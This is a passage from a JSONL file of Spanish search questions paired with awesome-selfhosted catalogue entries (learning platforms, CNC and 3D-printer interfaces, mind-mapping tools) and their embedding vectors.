[AGPL-3.0, Docker]. SiYuan β€” A privacy-first personal knowledge management software, written in typescript and golang [AGPL-3.0, Docker/Go]. TeamMapper β€” Host and create your own mindmaps. Share your mindmap sessions with your team and collaborate live on mindmaps [MIT, Docker/Nodejs].", "indexar": "hay alguna herramienta para crear mapas mentales que permita colaborar en tiempo real con el equipo?", "v": [0.09911, 0.15862, -0.16555, -0.09523, -0.02207, -0.1467, -0.09637, 0.0885, -0.15555, -0.14914, -0.00743, 0.03492, 0.13355, -0.01994, 0.06765, 0.15071, 0.15279, 0.01169, 0.00533, -0.04809, 0.05899, -0.02402, -0.11304, 0.0149, 0.01313, -0.14803, 0.05909, -0.03916, -0.19542, 0.05425, 0.04036, 0.15927, -0.00723, -0.07389, 0.00585, -0.09395, 0.05807, 0.02142, -0.02482, -0.05607, -0.04638, 0.03453, -0.0703, 0.0821, 0.00963, 0.02168, -0.08594, 0.02057, -0.00417, 0.07869, -0.02841, -0.06958, -0.08112, -0.09536, -0.02856, -0.17719, 0.178, -0.1176, -0.05651, -0.16718, -0.12953, 0.01316, -0.05798, -0.018, 0.00519, 0.07731, 0.05402, -0.04949, -0.07657, 0.0894, -0.11015, 0.01725, 0.04342, -0.0773, -0.01697, -0.05619, -0.02949, -0.03334, 0.0234, -0.04006, 0.10267, -0.01854, -0.00535, 0.03121, -0.01479, -0.08264, 0.0991, 0.02768, 0.0493, -0.09802, -0.06227, 0.09188, -0.00666, 0.03537, -0.00377, 0.03794, 0.07273, 0.0047, -0.01879, 0.07992, 0.01695, -0.06021, -0.10893, -3e-05, -0.07118, -0.00689, 0.01291, -0.02101, -0.02774, 0.0344, 0.09596, 0.00062, -0.04495, 0.02706, 0.05, 0.04255, -0.00715, 0.00305, -0.00082, -0.0574, 0.0148, 0.02434, -0.01541, -0.03126, -0.02506, 0.00611, -0.0585, -0.03826, 0.06565, -0.04995, -0.09436, 0.00282, -0.0918, 0.03238, -0.10863, 0.04351, 0.0105, 0.0295, 0.00779, -0.05747, 0.00055, 0.04595, -0.01062, -0.12522, -0.09023, 0.03976, -0.0748, -0.04247, -0.0481, 0.01599, 0.06425, 0.00281, 0.04452, 0.03768, -0.01141, 0.04063, 0.00447, 0.0346, -0.11421, 0.03014, -0.02246, 0.01538, 0.01207, -0.00127, -0.01413, -0.09698, 0.01362, 0.03356, 0.12594, 0.05133, -0.01969, -0.07593, 0.07871, -0.06569, 0.00415, -0.04713, -0.04328, -0.00411, 0.01731, -0.05718, -0.03649, -0.06849, 0.00385, 0.00119, -0.02522, -0.03432, 0.03239, 0.05187, 0.01804, -0.06545, -0.04674, 0.02832, 0.05034, -0.0139, 0.05145, -0.0005, 0.04657, -0.04211, 0.00044, -0.01164, -0.00474, -0.02521, 0.02356, 0.00402, -0.04894, 0.08941, -0.04168, 0.06145, 0.0114, 0.04543, 0.02508, -0.05683, -0.01597, -0.07503, -0.02627, -0.00492, -0.01453, -0.01906, -0.02641, 0.00298, 0.04685, 0.01049, 0.02378, 0.00407, 0.00956, 0.0635, 0.03288, 0.10196, 0.00042, -0.00275, 0.02403, -0.03695, 0.00586, -0.0231, 0.00618, -0.01686, 0.07939, -0.03769, -0.03011, -0.04648, 0.00834, 0.01727, -0.01939, -0.01264, -0.0158, -0.03605, -0.01234, -0.00465, 0.02299, -0.10556, -0.01498, 0.03112, 0.07231, -0.05228, 0.08907, -0.00694]} +{"tipo": "pregunta", "herramienta": "Learning and Courses", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Learning and Courses", "tema": "learning and courses", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Learning and Courses: Canvas LMS β€” Learning management system (LMS) that is revolutionizing the way we educate [AGPL-3.0, Ruby]. Chamilo LMS β€” Create a virtual campus for the provision of online or semi-online training [GPL-3.0, PHP]. Digiscreen β€” Interactive whiteboard/wallpaper for the classroom, in person or remotely (documentation in French) [AGPL-3.0, Nodejs/PHP]. Digitools β€” A set of simple tools to accompany the animation of courses in person or remotely. (documentation in French) [AGPL-3.0, PHP]. edX β€” The Open edX platform is open-source code that powers edX.org [AGPL-3.0, Python]. Gibbon β€” Flexible school management platform designed to make life better for teachers, students, parents and leaders [GPL-3.0, PHP]. Helium β€” Color-coded student planner for classes, homework, grades, and notes with smart notifications and multi-device sync [MIT, Python/Docker]. ILIAS β€” Learning management system that can cope with anything you throw at it [GPL-3.0, PHP].", "indexar": "que herramienta sirve para montar un campus virtual de formaciΓ³n online?", "v": [0.06635, 0.00168, -0.22661, -0.21106, -0.11442, -0.15586, -0.06509, -0.01931, 0.06035, -0.14122, -0.00242, -0.11256, 0.07762, -0.04016, 0.03534, 0.0714, 0.12667, -0.193, 0.04824, 0.09112, -0.04211, -0.01467, 0.00099, -0.02225, -0.06654, 0.05198, -0.06641, -0.10845, -0.07592, 0.04396, 0.07895, 0.11342, 0.00674, -0.02325, -0.0277, -0.14334, -0.06445, 0.06832, -0.05931, 0.08243, -0.02541, 0.0883, -0.05802, 0.04839, 0.05104, -0.02566, 0.01701, -0.07936, -0.01414, 0.05765, 0.01264, -0.07693, -0.05812, -0.00894, 0.01485, -0.1077, 0.13707, -0.16267, 0.08797, -0.1198, -0.11089, -0.00199, -0.06078, -0.01848, 0.03531, 0.00808, 0.03301, 0.03144, -0.20146, 0.03068, -0.04743, -0.12309, -0.01331, -0.02572, -0.12256, 0.04041, -0.0028, 0.05388, 0.09126, -0.06213, 0.04752, 0.04277, -0.05228, 0.08892, -0.04667, -0.04287, -0.00932, 0.01555, 0.099, 0.00665, -0.02894, 0.19331, -0.05455, -0.00233, 0.04783, -0.13038, 0.06729, 0.02815, -0.00548, -0.03717, -0.01589, 0.06511, -0.05075, 0.04004, -0.04458, -0.00146, -0.05662, -0.00375, -0.00808, 0.02911, 0.10103, 0.0207, -0.05992, 0.06145, 0.03853, -0.01033, 0.06928, 0.07224, 0.01148, -0.04563, 0.05326, 0.06894, 0.01645, -0.02729, -0.03009, 0.06372, 0.00572, 0.01714, 0.01038, -0.05951, -0.05159, -0.09574, -0.06467, -0.04739, -0.00787, -0.03983, 0.00586, -0.07581, -0.03701, -0.08202, 0.01174, 0.04065, -0.06829, -0.10795, -0.01318, -0.02313, 0.0468, -0.05505, -0.053, -0.0052, 0.03828, 0.05076, 0.0035, 0.02214, -0.13401, 0.01789, -0.06585, -0.01037, -0.05002, 0.04807, 0.00581, -0.01538, 0.07267, -0.01402, -0.00394, -0.02321, 0.01026, 0.03579, 0.04806, 0.09739, 0.03949, -0.00487, 0.04292, -0.03646, -0.02775, 0.01515, -0.01817, -0.00324, 0.01025, -0.02837, -0.00998, -0.03155, -0.02367, 0.00514, 0.01291, 0.01542, 0.05283, -0.02267, -0.06546, 0.05106, -0.02621, -0.02894, -0.07041, 0.01376, 0.08585, -0.0165, -0.06616, -0.02294, 0.12373, -0.03409, -0.029, -0.01919, -0.03159, -0.02719, -0.00703, 0.02978, -0.00651, -0.01943, -0.03268, 0.04596, -0.00793, -0.03846, -0.00254, -0.06749, 0.02822, -0.06848, 0.0519, -0.01253, -0.0471, -0.01686, -0.00023, -0.04444, -0.01501, 0.07079, 0.0167, 0.06811, -0.00384, -0.00537, -0.03207, -0.04721, 0.01547, -0.0268, 0.01377, -0.04382, -0.00596, -0.05878, 0.07038, 0.0691, -0.1067, 0.00013, 0.00382, 0.01331, 0.03042, -0.03617, -0.02036, -0.02975, -0.03835, 0.02042, -0.03644, -0.05301, -0.08154, -0.04328, 0.01324, 0.04429, -0.07431, 0.03881]} +{"tipo": "pregunta", "herramienta": "Learning and Courses", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Learning and Courses", "tema": "learning and courses", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Learning and Courses: Canvas LMS β€” Learning management system (LMS) that is revolutionizing the way we educate [AGPL-3.0, Ruby]. Chamilo LMS β€” Create a virtual campus for the provision of online or semi-online training [GPL-3.0, PHP]. Digiscreen β€” Interactive whiteboard/wallpaper for the classroom, in person or remotely (documentation in French) [AGPL-3.0, Nodejs/PHP]. Digitools β€” A set of simple tools to accompany the animation of courses in person or remotely. (documentation in French) [AGPL-3.0, PHP]. edX β€” The Open edX platform is open-source code that powers edX.org [AGPL-3.0, Python]. Gibbon β€” Flexible school management platform designed to make life better for teachers, students, parents and leaders [GPL-3.0, PHP]. Helium β€” Color-coded student planner for classes, homework, grades, and notes with smart notifications and multi-device sync [MIT, Python/Docker]. ILIAS β€” Learning management system that can cope with anything you throw at it [GPL-3.0, PHP].", "indexar": "cual es una alternativa libre a EdX para gestionar cursos educativos?", "v": [-0.18027, -0.01731, -0.0779, -0.06933, 0.00755, -0.0296, 0.02771, 0.03413, -0.17197, -0.09612, -0.17855, -0.17058, -0.08819, -0.03796, 0.05278, -0.06002, 0.19432, -0.05938, 0.06317, 0.01563, -0.07801, 0.04273, -0.06497, -0.01568, 0.06408, 0.01593, -0.12008, -0.03514, 0.0372, 0.11966, 0.02633, 0.15085, 0.05174, -0.10902, -0.00207, 0.15009, 0.09715, 0.10582, -0.05422, -0.01952, -0.06851, 0.02478, -0.01948, -0.06901, 0.07839, -0.11714, 0.02746, 0.02555, 0.03693, 0.04846, 0.0123, 0.0201, -0.08096, -0.06182, 0.09982, -0.02677, 0.04107, -0.1107, -0.04716, 0.01722, 0.03804, 0.0104, -0.01141, 0.09078, -0.01415, 0.01715, 0.07851, 0.03279, -0.15718, 0.16531, 0.06088, -0.13805, -0.00035, -0.02396, -0.07799, -0.07338, 0.02479, 0.01765, 0.02999, 0.04658, 0.02039, -0.03003, -0.04189, 0.0315, -0.07062, 0.0025, -0.06814, -0.04634, -0.03505, -0.01162, -0.03436, 0.06656, -0.09284, -0.03061, -0.01499, -0.07959, -0.01013, 0.00958, -0.01237, 0.06261, -0.00901, 0.06289, -0.07554, 0.02799, -0.12371, -0.0015, -0.00115, 0.01973, -0.08951, 0.05806, 0.03099, 0.0445, 0.00793, 0.06862, 0.01355, -0.02579, -0.04403, 0.01418, -0.01918, -0.00421, -0.05882, 0.02117, 0.02143, -0.07075, 0.13522, 0.06035, 0.08881, 0.00154, 0.00835, 0.06728, 0.04176, -0.04123, 0.00791, -0.09209, -0.09415, -0.05941, 0.07069, 0.05388, -0.01953, -0.05863, -0.03648, 0.07921, 0.02908, -0.00214, 0.0196, -0.05192, 0.03733, -0.03426, 0.08283, -0.0072, -0.05305, -0.10802, 0.04077, 0.14713, -0.03343, -0.00744, -0.04697, -0.05275, -0.1017, 0.0528, 0.02547, -0.00805, 0.01976, 0.00355, 0.01151, -0.02136, -0.03296, 0.05633, -0.08377, 0.0176, 0.02446, 0.08195, 0.06103, 0.02354, 0.0434, -0.1273, -0.05621, -0.15615, 0.0169, -0.03402, 0.05358, -0.06367, -0.03322, -0.02212, 0.01434, -0.04056, -0.07036, 0.10587, -0.03134, 0.02229, -0.06738, -0.02822, -0.09864, -0.12934, 0.02955, 0.00512, 0.00932, -0.09918, -0.02786, -0.01536, -0.06333, 0.01581, 0.01368, -0.07319, 0.01066, 0.0234, -0.04117, 0.06029, -0.01064, 0.04175, 0.00839, 0.05944, 0.05729, -0.02486, -0.03824, -0.06397, -0.00642, -0.01167, 0.05217, -0.00399, -0.01289, -0.01387, 0.00093, -0.00323, 0.00275, 0.01584, -0.00194, 0.05938, -0.0251, 0.03567, 0.03466, -0.01879, -0.00292, 0.0599, 0.0266, -0.03342, -0.0008, 0.02282, 0.03621, 0.03883, 0.07388, 0.07131, 0.0027, -0.04443, -0.03651, -0.03975, -0.03995, 0.05939, 0.00695, -0.04936, -0.0522, 0.03451, -0.00115, 0.08095, 0.02561, 0.01723]} +{"tipo": "pregunta", "herramienta": "Learning and Courses", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Learning and Courses", "tema": "learning and courses", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Learning and Courses: Canvas LMS β€” Learning management system (LMS) that is revolutionizing the way we educate [AGPL-3.0, Ruby]. Chamilo LMS β€” Create a virtual campus for the provision of online or semi-online training [GPL-3.0, PHP]. Digiscreen β€” Interactive whiteboard/wallpaper for the classroom, in person or remotely (documentation in French) [AGPL-3.0, Nodejs/PHP]. Digitools β€” A set of simple tools to accompany the animation of courses in person or remotely. (documentation in French) [AGPL-3.0, PHP]. edX β€” The Open edX platform is open-source code that powers edX.org [AGPL-3.0, Python]. Gibbon β€” Flexible school management platform designed to make life better for teachers, students, parents and leaders [GPL-3.0, PHP]. Helium β€” Color-coded student planner for classes, homework, grades, and notes with smart notifications and multi-device sync [MIT, Python/Docker]. ILIAS β€” Learning management system that can cope with anything you throw at it [GPL-3.0, PHP].", "indexar": "con que programa puedo organizar la gestiΓ³n escolar y los planes de clase de forma flexible?", "v": [0.00698, 0.06578, -0.1168, -0.20723, -0.04534, -0.09681, 0.06293, 0.02448, -0.09873, -0.17024, -0.10824, -0.01902, 0.04808, -0.06644, 0.08583, 0.01088, 0.07161, -0.09837, -0.04498, 0.00638, -0.16115, -0.05106, -0.05197, 0.0496, -0.04374, 0.0225, 0.07939, -0.0163, -0.03779, 0.03642, -0.02703, 0.09168, 0.04663, -0.17257, 0.0948, 0.06761, -0.0416, 0.10633, -0.13958, -0.00356, -0.15536, 0.04656, -0.07847, 0.05991, 0.10131, 0.06413, 0.06263, 0.10773, -0.00745, -0.00511, -0.03923, -0.01931, 0.03111, 0.05364, 0.0215, -0.05739, -0.07352, -0.09247, -0.09791, 0.00658, 0.01233, -0.02425, 0.03241, 0.01619, 0.12851, 0.10534, 0.06564, 0.04903, -0.06512, 0.00205, 0.04435, -0.10842, 0.07755, -0.00604, 0.05148, 0.06932, 0.03855, 0.11507, 0.02247, -0.01057, 0.04239, -0.01495, -0.13396, 0.05701, -0.00918, -0.02808, -0.03911, 0.02908, 0.0143, 0.0347, -0.05719, 0.0611, -0.07725, -0.03786, -0.0711, -0.04844, 0.1429, 0.03368, 0.02272, 0.01069, 0.03272, -0.00218, -0.08011, 0.11025, -0.10991, 0.1602, 0.05756, 0.05213, -0.02809, 0.08731, -0.03432, -0.02245, 0.01476, -0.04594, -0.03749, -0.0404, -0.01862, 0.04905, 0.00368, -0.04245, -0.01201, 0.0001, 0.03161, 0.02224, 0.12857, 0.07627, 0.06702, 0.09863, -0.01297, 0.08947, -0.02294, 0.02494, 0.0296, -0.00143, -0.0011, -0.08062, -0.01536, -0.03702, 0.05562, -0.04368, -0.03814, 0.16122, 0.08062, -0.04167, -0.00222, -0.08357, 0.05242, 0.00646, -0.02975, 0.02528, -0.08492, -0.0359, 0.02961, 0.06371, -0.06196, 0.05754, -0.00694, -0.04265, -0.0528, 0.05172, -0.07158, 0.03521, 0.01849, -0.02933, 0.05405, -0.09272, -0.00391, 0.00778, -0.05082, 0.05221, -0.00337, 0.05909, 0.04085, 0.0615, -0.03329, -0.07107, -0.0235, -0.16012, 0.05058, -0.01234, -0.04062, 0.04681, 0.00184, 0.04717, -0.00714, -0.07344, -0.04593, 0.03392, 0.03715, 0.00188, 0.03592, 0.0078, 0.02254, -0.05248, -0.02124, -0.0224, -0.08818, -0.05096, 0.07933, -0.02246, -0.0671, -0.03347, 0.03794, -0.0761, 0.02512, 0.06457, -0.03577, 0.03411, 0.05299, 0.10639, 0.01509, -0.02242, 0.09695, -0.01586, 0.00096, -0.00792, 0.00508, 0.00279, 0.09854, 0.00717, 0.01298, -0.00957, 0.05144, -0.05415, 0.05631, -0.06321, -0.01713, 0.04424, 0.08607, 0.03353, -0.00497, -0.00732, 0.0606, -0.02287, -0.03309, -0.05297, 0.03451, -0.0237, -0.01841, 0.00832, 0.01501, 0.08204, -0.02069, -0.01403, -0.10292, -0.00743, -0.07321, 0.04062, 0.03633, -0.06834, -0.00555, 0.02804, 0.07114, -0.0343, -0.00903, 0.0106]} +{"tipo": "pregunta", "herramienta": "Learning and Courses", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Learning and Courses", "tema": "learning and courses", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Learning and Courses: INGInious β€” Intelligent grader that allows secured and automated testing of code made by students [AGPL-3.0, Python/Docker]. Moodle β€” Learning and courses platform with one of the largest open source communities worldwide [GPL-3.0, PHP]. Open eClass β€” Open eClass is an advanced e-learning solution that can enhance the teaching and learning process [GPL-2.0, PHP]. OpenOLAT β€” Learning management system for teaching, education, assessment and communication [Apache-2.0, Java]. QST β€” Online assessment software. From a quick quiz on your phone to large scale, high stakes, proctored desktop testing, easy, secure and economical [GPL-2.0, Perl]. RELATE β€” Courseware package that includes features such as: flexible rules, statistics, multi-course support, class calendar [MIT, Python]. RosarioSIS β€” Student Information System for school management. Features students demographics, grades, scheduling, attendance, student billing, discipline & food service modules [GPL-2.0, PHP].", "indexar": "que programa hay para hacer pruebas automΓ‘ticas de cΓ³digo estudiantil?", "v": [0.20478, 0.03463, -0.05416, -0.10652, 0.02485, -0.12771, -0.00776, 0.03997, -0.09506, -0.05806, -0.02919, -0.0818, 0.02812, -0.05782, 0.01097, -0.04079, 0.16137, -0.12696, 0.06858, 0.04947, -0.00607, -0.02397, -0.06539, -0.03632, -0.03582, 0.06368, -0.0433, 0.03829, -0.00792, -0.03791, 0.03711, 0.05632, 0.16819, -0.11084, -0.003, 0.05431, 0.06053, 0.12065, 0.00162, 0.08443, 0.02028, 0.04079, -0.08857, -0.02009, 0.10319, 0.07307, 0.04081, 0.07184, -0.07191, -0.07337, 0.03335, -0.03161, 0.04801, -0.04644, 0.06445, -0.08154, -0.02326, -0.03756, -0.10437, -0.10237, 0.1685, -0.03438, 0.10561, 0.04365, 0.03775, 0.03868, 0.21253, 0.02193, -0.0535, 0.08622, 0.04067, 0.02419, -0.00299, -0.07459, -0.09687, 0.14042, -0.0641, -0.11349, 0.10846, 0.00962, -0.04333, 0.02399, -0.00845, 0.04434, 0.0173, -0.07729, -0.05937, -0.07761, -0.01062, -0.06756, 0.03604, 0.06861, -0.02128, 0.12823, 0.12123, -0.08183, 0.09046, 0.02217, 0.08605, -0.04273, 0.0336, -0.12556, 0.03316, 0.06137, 0.00713, 0.03096, 0.01883, 0.01723, 0.00695, 0.05194, 0.03073, -0.06309, -0.09198, -0.05061, -0.12606, 0.01119, 0.04271, 0.01313, -0.07859, -0.11333, -0.06983, 0.06226, -0.05179, 0.04663, 0.0733, 0.13292, 0.04303, 0.07734, -0.02584, 0.05065, 0.02371, 0.03434, -0.02477, 0.00815, -0.025, -0.03293, 0.05265, 0.00415, 0.01265, 0.01364, 0.05314, 0.11783, 0.03597, 0.03214, -0.00147, 0.03534, -0.05743, -0.00695, -0.0929, 0.02764, -0.05758, -0.02817, -0.05153, 0.06834, -0.10984, -0.01482, 0.01788, -0.03203, -0.032, 0.03196, -0.04162, 0.0109, -0.05114, -0.03647, 0.02848, -0.00381, -0.00309, 0.03179, 0.01441, 0.06374, 0.02058, 0.00159, 0.01079, -0.02058, 0.10837, 0.0278, 0.06936, -0.07957, -0.04845, -0.09916, -0.04407, 0.06507, 0.04178, -0.03076, 0.10434, 0.01581, 0.02519, 0.01936, 0.10713, 0.02098, 0.02208, 0.04154, -0.00652, -0.00442, -0.01655, 0.02762, -0.01622, -0.02271, 0.01712, -0.07034, -0.10047, 0.04845, 0.01804, -0.09085, 0.02125, 0.06951, -0.05179, -0.00686, -0.00442, 0.08229, -0.02366, 0.01729, 0.11889, -0.05788, -0.05279, 0.00031, 0.02694, 0.05111, 0.02381, -0.00811, 0.01595, -0.00923, 0.011, 0.08767, -0.01336, -0.00554, 0.04265, 0.14189, 0.05598, 0.0211, 0.0012, 0.04161, 0.03679, -0.03946, 0.05817, 0.04383, -0.04038, 0.001, -0.01884, -0.10774, -0.01242, 0.01527, -0.01739, -0.0711, -0.0665, 0.02546, -0.03771, -0.00031, 0.02274, -0.03848, -0.00557, -0.01006, -0.01563, -0.03226, 0.02424, 0.01786]} +{"tipo": "pregunta", "herramienta": "Learning and Courses", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Learning and Courses", "tema": "learning and courses", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Learning and Courses: INGInious β€” Intelligent grader that allows secured and automated testing of code made by students [AGPL-3.0, Python/Docker]. Moodle β€” Learning and courses platform with one of the largest open source communities worldwide [GPL-3.0, PHP]. Open eClass β€” Open eClass is an advanced e-learning solution that can enhance the teaching and learning process [GPL-2.0, PHP]. OpenOLAT β€” Learning management system for teaching, education, assessment and communication [Apache-2.0, Java]. QST β€” Online assessment software. From a quick quiz on your phone to large scale, high stakes, proctored desktop testing, easy, secure and economical [GPL-2.0, Perl]. RELATE β€” Courseware package that includes features such as: flexible rules, statistics, multi-course support, class calendar [MIT, Python]. RosarioSIS β€” Student Information System for school management. Features students demographics, grades, scheduling, attendance, student billing, discipline & food service modules [GPL-2.0, PHP].", "indexar": "cual es una plataforma libre para gestionar cursos y clases?", "v": [-0.07942, 0.0445, -0.0608, -0.16845, -0.06029, -0.17079, 0.03532, 0.0066, -0.1202, -0.12007, -0.13843, -0.1462, -0.00985, 0.02682, 0.02252, 0.01909, 0.0844, -0.07317, -0.00039, 0.02179, -0.15461, -0.04167, -0.07354, -0.06006, -0.09017, -0.0579, 0.09273, -0.14138, -0.05885, 0.00651, -0.02861, 0.00522, 0.05414, -0.13108, 0.10297, -0.00063, -0.00474, 0.13633, -0.05105, 0.00405, -0.07148, 0.0639, -0.01685, 0.01814, 0.12027, -0.05872, 0.0872, -0.02292, 0.06151, -0.0181, -0.05452, -0.00905, -0.09491, 0.01972, -0.03701, -0.02157, 0.01266, -0.08217, -0.00142, 0.00158, -0.04308, 0.00321, -0.01712, 0.01662, 0.00872, -0.02433, 0.08729, 0.15637, -0.12434, 0.177, 0.07082, -0.095, -0.03703, 0.02431, -0.01784, 0.01758, 0.00549, 0.03664, 0.01878, -0.01793, 0.04516, -0.01269, -0.12077, 0.08621, -0.02553, -0.01629, -0.04106, -0.0471, 0.00371, -0.02725, -0.0224, 0.05234, -0.08022, -0.07968, -0.0228, -0.07334, -0.0141, -0.02189, -0.00609, -0.05761, -0.02149, 0.11624, -0.03689, 0.02364, -0.11052, 0.10925, 0.01879, -0.03921, -0.08197, 0.02338, 0.02762, 0.03262, 0.0289, 0.01889, 0.00207, 0.02423, -0.04855, 0.05748, 0.0591, 0.02884, 0.01623, 0.00089, 0.00647, -0.08396, 0.18243, 0.06924, 0.05899, 0.06209, -0.01622, 0.07008, -0.01142, -0.07693, -0.00901, -0.05545, 0.01934, -0.06046, 0.09261, 0.03031, -0.07168, -0.10912, -0.04272, 0.1211, 0.05049, -0.03937, 0.05769, -0.08326, 0.06578, -0.13162, 0.02928, 0.04253, -0.10758, -0.03042, 0.0052, 0.11602, -0.07232, -0.08338, -0.02363, -0.07391, -0.11525, 0.05107, -0.01055, 0.03219, 0.02366, 0.0131, 0.00327, 0.0102, -0.04283, 0.12374, -0.08839, 0.00897, 0.0691, 0.09213, 0.0918, 0.00071, 0.05565, -0.06481, -0.02167, -0.15548, 0.01568, -0.01184, -0.00062, -0.03498, -0.02242, -0.0065, -0.01716, -0.01228, -0.03643, 0.01928, -0.01354, 0.07254, -0.08085, 0.03008, -0.13607, -0.07047, 0.04803, 0.02868, -0.08468, -0.04269, 0.02268, -0.02304, -0.08244, 0.03547, -0.01228, -0.02206, -0.02276, 0.02764, 0.01092, 0.02132, 0.02863, -0.00888, -0.03677, 0.04822, 0.0797, -0.06131, -0.01992, -0.03775, 0.03405, 0.00324, 0.03512, -0.0374, 0.00704, 0.03881, 0.00429, -0.00499, 0.01685, 0.01616, 0.02566, 0.04983, 0.0074, 0.03063, 0.01966, -0.01724, 0.01438, -0.00159, 0.02702, -0.04764, 0.06215, 0.03684, -0.02639, 0.04757, -0.00037, 0.07565, 0.01846, -0.05011, -0.03215, -0.02688, -0.08983, 0.0138, -0.01493, -0.05727, -0.0655, 0.01022, 0.07081, 0.03326, -0.02603, 0.01302]} +{"tipo": "pregunta", "herramienta": "Learning and Courses", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Learning and Courses", "tema": "learning and courses", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Learning and Courses: INGInious β€” Intelligent grader that allows secured and automated testing of code made by students [AGPL-3.0, Python/Docker]. Moodle β€” Learning and courses platform with one of the largest open source communities worldwide [GPL-3.0, PHP]. Open eClass β€” Open eClass is an advanced e-learning solution that can enhance the teaching and learning process [GPL-2.0, PHP]. OpenOLAT β€” Learning management system for teaching, education, assessment and communication [Apache-2.0, Java]. QST β€” Online assessment software. From a quick quiz on your phone to large scale, high stakes, proctored desktop testing, easy, secure and economical [GPL-2.0, Perl]. RELATE β€” Courseware package that includes features such as: flexible rules, statistics, multi-course support, class calendar [MIT, Python]. RosarioSIS β€” Student Information System for school management. Features students demographics, grades, scheduling, attendance, student billing, discipline & food service modules [GPL-2.0, PHP].", "indexar": "con que puedo montar un sistema de gestiΓ³n escolar con calificaciones y asistencia?", "v": [0.09548, 0.11143, -0.09213, -0.21611, -0.05847, -0.05968, -0.00665, 0.01451, -0.09991, -0.09582, -0.09275, -0.02122, 0.03876, -0.01036, 0.1333, 0.05499, 0.04917, -0.05117, -0.05702, 0.05268, -0.0213, -0.11324, -0.03224, -0.02432, -0.02923, 0.10722, 0.0225, -0.07767, 0.01069, -0.00467, 0.03237, 0.04815, 0.02339, -0.11977, 0.0137, -0.00014, -0.01985, 0.09062, -0.10845, 0.00871, -0.05753, -0.0107, 0.02228, 0.00237, 0.16081, -0.06821, 0.06706, 0.13154, -0.02439, -0.10167, 0.08138, -0.03746, -0.05004, -0.05523, -0.03091, -0.06131, 0.01116, 0.00658, 0.08607, -0.0577, -0.00348, 0.07564, -0.0754, 0.04652, 0.10951, 0.0422, 0.04367, -0.05742, -0.10626, 0.05801, 0.06417, -0.09458, 0.07175, 0.02066, -0.02613, 0.09344, 0.02709, 0.14534, 0.11769, -0.03894, 0.08231, -0.02676, -0.09042, 0.05468, 0.00061, -0.01715, -0.06608, -0.09987, 0.12367, -0.03637, -0.06256, -0.03424, -0.04682, -0.06992, -0.02363, -0.05155, 0.10488, 0.00717, -0.03958, -0.01195, -0.01342, -0.02221, 0.03784, 0.11053, -0.05223, 0.0735, 0.12069, -0.08288, 0.05863, -0.08802, 0.01553, 0.01421, -0.06821, -0.02795, -0.07584, -0.07041, -0.09991, 0.03303, -0.07358, -0.00041, 0.033, 0.12688, 0.04242, -0.10262, 0.10529, 0.04246, 0.16019, 0.008, 0.05627, 0.09887, -0.03037, 0.01994, -0.03573, -0.01614, 0.06433, -0.04553, -0.04098, 0.04252, -0.0084, -0.0008, -0.0121, 0.12794, 0.08085, -0.08013, -0.01051, 0.01271, 0.03103, -0.02373, 0.03631, -0.0329, -0.01979, 0.04654, 0.03756, 0.04393, -0.05234, 0.02379, 0.11243, -0.05569, -0.00397, 0.03652, 0.04504, 0.08031, 0.0126, 0.02915, -0.00668, -0.0109, -0.0012, 0.01026, 0.04955, -0.04471, -0.02379, 0.07032, -0.01706, 0.04684, 0.0878, -0.08919, -0.04876, -0.12046, 0.03462, 0.00944, -0.06466, 0.00618, -0.03196, 0.04867, -0.02075, 0.03691, -0.07396, -0.00498, 0.01333, 0.07168, 0.07758, 0.03018, -0.00153, -3e-05, 0.0438, -0.01707, -0.05333, -0.07832, 0.04725, 0.00092, -0.06923, -0.03917, 0.00426, -0.0945, -0.0176, 0.02428, 0.0166, 0.11826, 0.1002, 0.12121, -0.01616, 0.00348, 0.08272, -0.02917, -0.02711, 0.01613, 0.01178, -0.03158, -0.02863, -0.07208, -0.02061, 0.01049, 0.04983, 0.02282, 0.05142, -0.01798, -0.00199, 0.02422, 0.07799, 0.01507, -0.02071, -0.07204, 0.01799, -0.03661, -0.04146, -0.03809, 0.03204, -0.04364, -0.04131, -0.00079, 0.07461, 0.09017, -0.01622, -0.06708, -0.05992, -0.04085, -0.08353, 0.05732, 0.05216, -0.11505, -0.02452, 0.02913, 0.01332, -0.0398, 0.01724, -0.05452]} +{"tipo": "pregunta", "herramienta": "Manufacturing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Manufacturing", "tema": "manufacturing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Manufacturing: CNCjs β€” Web interface for CNC milling controllers running Grbl, Smoothieware, or TinyG [MIT, Nodejs]. Fluidd β€” Lightweight & responsive user interface for Klipper, the 3D printer firmware [GPL-3.0, Docker/Nodejs]. LinuxCNC β€” Linux based CNC machine controller. It can drive milling machines, lathes, 3D printers, laser cutters, plasma cutters, robot arms, hexapods, and more [GPL-2.0/LGPL-3.0, C/deb]. Mainsail β€” Modern and responsive user interface for the Klipper 3D printer firmware. Control and monitor your printer from everywhere, from any device [GPL-3.0, Docker/Python]. Manyfold β€” Digital asset manager for 3d print files; STL, OBJ, 3MF and more [MIT, Docker]. Octoprint β€” Snappy web interface for controlling consumer 3D printers [AGPL-3.0, Docker/Python].", "indexar": "que programa hay para controlar mΓ‘quinas CNC desde la web?", "v": [0.021, -0.05069, -0.00572, -0.21131, -0.0905, -0.16922, -0.09456, 0.15226, -0.06043, -0.02247, -0.03216, -0.06895, 0.03503, -0.12335, -0.07347, 0.08782, -0.01961, -0.15062, 0.10143, 0.15401, -0.11407, -0.07221, 0.06346, -0.01019, -0.00519, 0.11078, -0.03522, 